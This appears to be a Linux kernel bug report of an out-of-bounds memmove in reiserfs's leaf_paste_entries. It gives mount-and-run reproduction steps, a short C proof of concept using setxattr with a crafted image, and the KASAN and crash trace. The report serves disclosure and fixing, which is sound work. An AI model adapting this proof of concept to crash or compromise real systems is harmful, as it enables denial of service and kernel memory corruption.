Created attachment 277007 [details]
The (compressed) crafted image which causes crash

- Reproduce
# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 13.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
    #define _GNU_SOURCE
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <sys/xattr.h>

    #include <dirent.h>
    #include <errno.h>
    #include <error.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #include <linux/falloc.h>
    #include <linux/loop.h>

    static void activity(char *mpoint) {

      char *xattr;
      int err;

      err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint);

      // xattr
      char buf2[113];
      memset(buf2, 0, sizeof(buf2));
      setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE);
   
    }

    int main(int argc, char *argv[]) {
      activity(argv[1]);
      return 0;
    }

- Kernel message
[  338.456535] ==================================================================
[  338.458262] BUG: KASAN: out-of-bounds in leaf_paste_entries+0x1eb/0x380
[  338.459816] Read of size 18446744073709551552 at addr ffff8801cbb80e20 by task a.out/1424
[  338.461695]
[  338.463062]
[  338.463440] The buggy address belongs to the page:
[  338.464546] page:ffffea00072ee000 count:2 mapcount:0 mapping:ffff8801f4563e50 index:0x2013
[  338.466455] flags: 0x2ffff0000001064(referenced|lru|active|private)
[  338.467834] raw: 02ffff0000001064 ffffea00072f4e08 ffff8801e0aa2430 ffff8801f4563e50
[  338.469519] raw: 0000000000002013 ffff8801d0b85f18 00000002ffffffff ffff8801e008d500
[  338.471181] page dumped because: kasan: bad access detected
[  338.472376] page->mem_cgroup:ffff8801e008d500
[  338.473308]
[  338.473641] Memory state around the buggy address:
[  338.474692]  ffff8801cbb80d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  338.476243]  ffff8801cbb80d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  338.477783] >ffff8801cbb80e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  338.479385]                                ^
[  338.480314]  ffff8801cbb80e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  338.481764]  ffff8801cbb80f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  338.483586] ==================================================================
[  338.595067] general protection fault: 0000 [#1] SMP KASAN PTI
[  338.596414] CPU: 0 PID: 1425 Comm: kworker/u4:1 Tainted: G    B             4.18.0-rc1+ #8
[  338.598117] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  338.600172] RIP: 0010:kmem_cache_alloc+0xa9/0x1e0
[  338.601145] Code: 01 00 00 41 8b 46 20 48 8d 4a 01 49 8b 3e 49 8b 1c 04 4c 89 e0 65 48 0f c7 0f 0f 94 c0 84 c0 74 bb 48 85 db 74 0b 41 8b 46 20 <48> 8b 04 03 0f 18 08 41 f7 c5 00 80 00 00 0f 85 10 01 00 00 8b 15
[  338.605043] RSP: 0000:ffff8801f308f208 EFLAGS: 00010286
[  338.606126] RAX: 0000000000000000 RBX: ba60011d0000039f RCX: 0000000000000344
[  338.607612] RDX: 0000000000000343 RSI: 0000000000480020 RDI: 0000000000032df0
[  338.609087] RBP: ffff8801f308f238 R08: ffff8801f6e32df0 R09: ffffed003d671872
[  338.610564] R10: 0000000000000001 R11: ffffed003d671871 R12: ffff8801d0b64268
[  338.612034] R13: 0000000000480020 R14: ffff8801e678ee00 R15: ffff8801e678ee00
[  338.613500] FS:  0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  338.615175] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  338.616368] CR2: 00007f374adcda76 CR3: 00000001ef1f4000 CR4: 00000000000006f0
[  338.617849] Call Trace:
[  338.618394]  ? __es_insert_extent+0x11b/0x590
[  338.619304]  __es_insert_extent+0x11b/0x590
[  338.620184]  ext4_es_insert_extent+0x188/0x2d0
[  338.621112]  ? ext4_es_find_delayed_extent_range+0x2d0/0x2d0
[  338.622288]  ? kasan_check_write+0x14/0x20
[  338.623165]  ? ext4_es_lookup_extent+0x276/0x310
[  338.624180]  ext4_map_blocks+0x4e1/0xa50
[  338.625023]  ? ext4_issue_zeroout+0xa0/0xa0
[  338.625956]  ? add_to_page_cache_locked+0x20/0x20
[  338.627004]  ? unwind_next_frame.part.5+0xa5/0x490
[  338.628033]  ext4_mpage_readpages+0x607/0xcc0
[  338.628956]  ? mpage_end_io+0xd0/0xd0
[  338.629729]  ? __isolate_free_page+0x2a0/0x2a0
[  338.630695]  ? simple_dname+0xb0/0xb0
[  338.631559]  ? __follow_mount_rcu.isra.27+0x3f/0x200
[  338.632599]  ext4_readpages+0x67/0x70
[  338.633392]  read_pages+0x118/0x2d0
[  338.634139]  ? read_cache_pages+0x220/0x220
[  338.635032]  __do_page_cache_readahead+0x300/0x330
[  338.636031]  ? __do_page_cache_readahead+0x300/0x330
[  338.637067]  ? read_pages+0x2d0/0x2d0
[  338.637841]  ? radix_tree_lookup_slot+0x67/0xb0
[  338.638808]  ? __radix_tree_lookup+0x160/0x160
[  338.639736]  ondemand_readahead+0x172/0x440
[  338.640610]  page_cache_sync_readahead+0x5e/0x90
[  338.641575]  generic_file_read_iter+0xcb1/0xff0
[  338.654447]  ? aa_file_perm+0xdb/0x5f0
[  338.655248]  ? filemap_range_has_page+0x170/0x170
[  338.656231]  ? aa_path_link+0x200/0x200
[  338.657037]  ? apparmor_bprm_set_creds+0x52b/0xd40
[  338.658059]  ? ext4_xattr_ibody_get+0x320/0x320
[  338.659028]  ext4_file_read_iter+0xa0/0x170
[  338.659932]  __vfs_read+0x283/0x400
[  338.660677]  ? __x64_sys_copy_file_range+0x380/0x380
[  338.661733]  ? __fsnotify_inode_delete+0x20/0x20
[  338.662720]  ? rw_verify_area+0x78/0x140
[  338.663552]  vfs_read+0xbf/0x1b0
[  338.664234]  kernel_read+0x6e/0xa0
[  338.664951]  prepare_binprm+0x1d5/0x390
[  338.665754]  ? install_exec_creds+0xc0/0xc0
[  338.666645]  ? _cond_resched+0x1a/0x50
[  338.667434]  __do_execve_file.isra.34+0x961/0xe50
[  338.668413]  ? prepare_bprm_creds+0xa0/0xa0
[  338.669290]  do_execve+0x25/0x30
[  338.670004]  call_usermodehelper_exec_async+0x25c/0x270
[  338.671114]  ? umh_complete+0x50/0x50
[  338.671897]  ret_from_fork+0x35/0x40
[  338.672674] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  338.682823] ---[ end trace 2e85051acb5f6dc1 ]---
[  338.683802] RIP: 0010:kmem_cache_alloc+0xa9/0x1e0
[  338.684789] Code: 01 00 00 41 8b 46 20 48 8d 4a 01 49 8b 3e 49 8b 1c 04 4c 89 e0 65 48 0f c7 0f 0f 94 c0 84 c0 74 bb 48 85 db 74 0b 41 8b 46 20 <48> 8b 04 03 0f 18 08 41 f7 c5 00 80 00 00 0f 85 10 01 00 00 8b 15
[  338.688715] RSP: 0000:ffff8801f308f208 EFLAGS: 00010286
[  338.689796] RAX: 0000000000000000 RBX: ba60011d0000039f RCX: 0000000000000344
[  338.691264] RDX: 0000000000000343 RSI: 0000000000480020 RDI: 0000000000032df0
[  338.692749] RBP: ffff8801f308f238 R08: ffff8801f6e32df0 R09: ffffed003d671872
[  338.694223] R10: 0000000000000001 R11: ffffed003d671871 R12: ffff8801d0b64268
[  338.695729] R13: 0000000000480020 R14: ffff8801e678ee00 R15: ffff8801e678ee00
[  338.697215] FS:  0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  338.698884] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  338.700090] CR2: 00007f374adcda76 CR3: 00000001ef1f4000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/lbalance.c#L1378
	/* prepare space for new entry heads */
	deh += before;
	memmove((char *)(deh + new_entry_count), deh,
		insert_point - (char *)deh);
`size` of memmove is invalid which leads to out-of-bound access during memmove()

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.